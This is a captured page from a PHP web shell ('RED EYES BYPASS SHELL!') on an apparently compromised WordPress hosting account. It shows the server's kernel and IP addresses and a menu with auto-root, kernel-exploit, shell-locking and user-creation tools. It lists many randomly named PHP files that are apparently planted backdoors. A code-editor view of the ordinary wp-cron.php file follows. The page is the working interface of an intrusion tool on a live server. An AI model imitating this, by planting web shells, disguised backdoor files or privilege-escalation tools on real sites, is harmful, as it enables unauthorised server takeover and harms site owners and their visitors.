Linux webm003.cluster107.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.107.20.3 | : 216.73.216.205
Cant Read [ /etc/named.conf ]
hexamanupu
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
hexamanupu /
www /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.tmb136b63
[ DIR ]
dr--r--r--
0aebe
[ DIR ]
dr-xr-xr-x
boss2026yt
[ DIR ]
drwxr-xr-x
br2026yt
[ DIR ]
drwxr-xr-x
well-known64380a
[ DIR ]
drwxr-xr-x
wp-admina6fe9c
[ DIR ]
drwxr-xr-x
wp-contentd9f11e
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
wp-includes439bd5
[ DIR ]
drwxr-xr-x
.htaccess
1.13
KB
-r-xr-xr-x
1.txt90658f
6
B
-rw-r--r--
222.php148e7d
15.76
KB
-rw-r--r--
9a1c6959dd25dd44842341d12f8450f1123b96
52
B
-rw-r--r--
TSuUh.phpd6f0ac
1.29
KB
-rw-r--r--
adminner.php1a0298
67.86
KB
-rw-r--r--
buy.php
1.46
KB
-r--r--r--
click.php
2
KB
-r--r--r--
defaults.php
1.93
KB
-r--r--r--
detail.php6ef055
24.29
KB
-rw-r--r--
googlebb3efcc4a0a209ca.htmla91c0f
53
B
-rw-r--r--
googled3df579f0171ab33.html
53
B
-rw-r--r--
hyBQG.phpe01f9e
1.29
KB
-rw-r--r--
iNtsg68ea5e
0
B
-rw-r--r--
index.php
12.42
KB
-r-xr-xr-x
jDITV9a0428
0
B
-rw-r--r--
license.txt4e74c3
19.44
KB
-rw-r--r--
lowpr.php19a55f
1.02
KB
-rw-r--r--
o647ye.phpdf04ec
50.63
KB
-rw-r--r--
product.php
1.87
KB
-r--r--r--
products.php971220
24.27
KB
-rw-r--r--
readme.html6a3328
7.23
KB
-rw-r--r--
robots.txt
353
B
-r--r--r--
robots.txt20ee9a
253
B
-rw-r--r--
wp-activate.php98279c
7.2
KB
-rw-r--r--
wp-blog-header.php6c8f6c
351
B
-rw----r--
wp-comments-post.phpf14dc2
2.27
KB
-rw----r--
wp-config-sample.phpd4b29c
3.26
KB
-rw-r--r--
wp-config.php42c3c6
2.37
KB
-rw-------
wp-cron.php19ea39
5.49
KB
-rw-r--r--
wp-ea37bw5k.php577c7d
50.23
KB
-rw-r--r--
wp-links-opml.phpd96cfb
2.43
KB
-rw-r--r--
wp-load.php96508f
3.84
KB
-rw-r--r--
wp-mail.php16ec9d
8.52
KB
-rw-r--r--
wp-settings.php9dcb2a
31.88
KB
-rw-r--r--
wp-signup.phpf7d432
33.81
KB
-rw-r--r--
wp-stat.php100027
164.14
KB
-rw-r--r--
wp-trackback.phpe9792f
5.09
KB
-rw-r--r--
wp-ttcxamxv.phpdc52b7
50.63
KB
-rw-r--r--
wp-v3qnqww.php23f0a7
50.23
KB
-rw-r--r--
wp-wkajepch.php96032d
50.63
KB
-rw-r--r--
wrsou2x3.phpf6e7b4
50.23
KB
-rw-r--r--
xmlrpc.php005bca
3.13
KB
-rw-r--r--
xmlrpc_bkp.php705619
1.04
KB
-rw-r--r--
xxmlrpc.phpf91f16
1.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-cron.php19ea39
<?php /** * A pseudo-cron daemon for scheduling WordPress tasks. * * WP-Cron is triggered when the site receives a visit. In the scenario * where a site may not receive enough visits to execute scheduled tasks * in a timely manner, this file can be called directly or via a server * cron daemon for X number of times. * * Defining DISABLE_WP_CRON as true and calling this file directly are * mutually exclusive and the latter does not rely on the former to work. * * The HTTP request to this file will not slow down the visitor who happens to * visit when a scheduled cron event runs. * * @package WordPress */ ignore_user_abort( true ); if ( ! headers_sent() ) { header( 'Expires: Wed, 11 Jan 1984 05:00:00 GMT' ); header( 'Cache-Control: no-cache, must-revalidate, max-age=0' ); } // Don't run cron until the request finishes, if possible. if ( function_exists( 'fastcgi_finish_request' ) ) { fastcgi_finish_request(); } elseif ( function_exists( 'litespeed_finish_request' ) ) { litespeed_finish_request(); } if ( ! empty( $_POST ) || defined( 'DOING_AJAX' ) || defined( 'DOING_CRON' ) ) { die(); } /** * Tell WordPress the cron task is running. * * @var bool */ define( 'DOING_CRON', true ); if ( ! defined( 'ABSPATH' ) ) { /** Set up WordPress environment */ require_once __DIR__ . '/wp-load.php'; } // Attempt to raise the PHP memory limit for cron event processing. wp_raise_memory_limit( 'cron' ); /** * Retrieves the cron lock. * * Returns the uncached `doing_cron` transient. * * @ignore * @since 3.3.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @return string|int|false Value of the `doing_cron` transient, 0|false otherwise. */ function _get_cron_lock() { global $wpdb; $value = 0; if ( wp_using_ext_object_cache() ) { /* * Skip local cache and force re-fetch of doing_cron transient * in case another process updated the cache. */ $value = wp_cache_get( 'doing_cron', 'transient', true ); } else { $row = $wpdb->get_row( $wpdb->prepare( "SELECT option_value FROM $wpdb->options WHERE option_name = %s LIMIT 1", '_transient_doing_cron' ) ); if ( is_object( $row ) ) { $value = $row->option_value; } } return $value; } $crons = wp_get_ready_cron_jobs(); if ( empty( $crons ) ) { die(); } $gmt_time = microtime( true ); // The cron lock: a unix timestamp from when the cron was spawned. $doing_cron_transient = get_transient( 'doing_cron' ); // Use global $doing_wp_cron lock, otherwise use the GET lock. If no lock, try to grab a new lock. if ( empty( $doing_wp_cron ) ) { if ( empty( $_GET['doing_wp_cron'] ) ) { // Called from external script/job. Try setting a lock. if ( $doing_cron_transient && ( $doing_cron_transient + WP_CRON_LOCK_TIMEOUT > $gmt_time ) ) { return; } $doing_wp_cron = sprintf( '%.22F', microtime( true ) ); $doing_cron_transient = $doing_wp_cron; set_transient( 'doing_cron', $doing_wp_cron ); } else { $doing_wp_cron = $_GET['doing_wp_cron']; } } /* * The cron lock (a unix timestamp set when the cron was spawned), * must match $doing_wp_cron (the "key"). */ if ( $doing_cron_transient !== $doing_wp_cron ) { return; } foreach ( $crons as $timestamp => $cronhooks ) { if ( $timestamp > $gmt_time ) { break; } foreach ( $cronhooks as $hook => $keys ) { foreach ( $keys as $k => $v ) { $schedule = $v['schedule']; if ( $schedule ) { $result = wp_reschedule_event( $timestamp, $schedule, $hook, $v['args'], true ); if ( is_wp_error( $result ) ) { error_log( sprintf( /* translators: 1: Hook name, 2: Error code, 3: Error message, 4: Event data. */ __( 'Cron reschedule event error for hook: %1$s, Error code: %2$s, Error message: %3$s, Data: %4$s' ), $hook, $result->get_error_code(), $result->get_error_message(), wp_json_encode( $v ) ) ); /** * Fires if an error happens when rescheduling a cron event. * * @since 6.1.0 * * @param WP_Error $result The WP_Error object. * @param string $hook Action hook to execute when the event is run. * @param array $v Event data. */ do_action( 'cron_reschedule_event_error', $result, $hook, $v ); } } $result = wp_unschedule_event( $timestamp, $hook, $v['args'], true ); if ( is_wp_error( $result ) ) { error_log( sprintf( /* translators: 1: Hook name, 2: Error code, 3: Error message, 4: Event data. */ __( 'Cron unschedule event error for hook: %1$s, Error code: %2$s, Error message: %3$s, Data: %4$s' ), $hook, $result->get_error_code(), $result->get_error_message(), wp_json_encode( $v ) ) ); /** * Fires if an error happens when unscheduling a cron event. * * @since 6.1.0 * * @param WP_Error $result The WP_Error object. * @param string $hook Action hook to execute when the event is run. * @param array $v Event data. */ do_action( 'cron_unschedule_event_error', $result, $hook, $v ); } /** * Fires scheduled events. * * @ignore * @since 2.1.0 * * @param string $hook Name of the hook that was scheduled to be fired. * @param array $args The arguments to be passed to the hook. */ do_action_ref_array( $hook, $v['args'] ); // If the hook ran too long and another cron process stole the lock, quit. if ( _get_cron_lock() !== $doing_wp_cron ) { return; } } } } if ( _get_cron_lock() === $doing_wp_cron ) { delete_transient( 'doing_cron' ); } die();
Close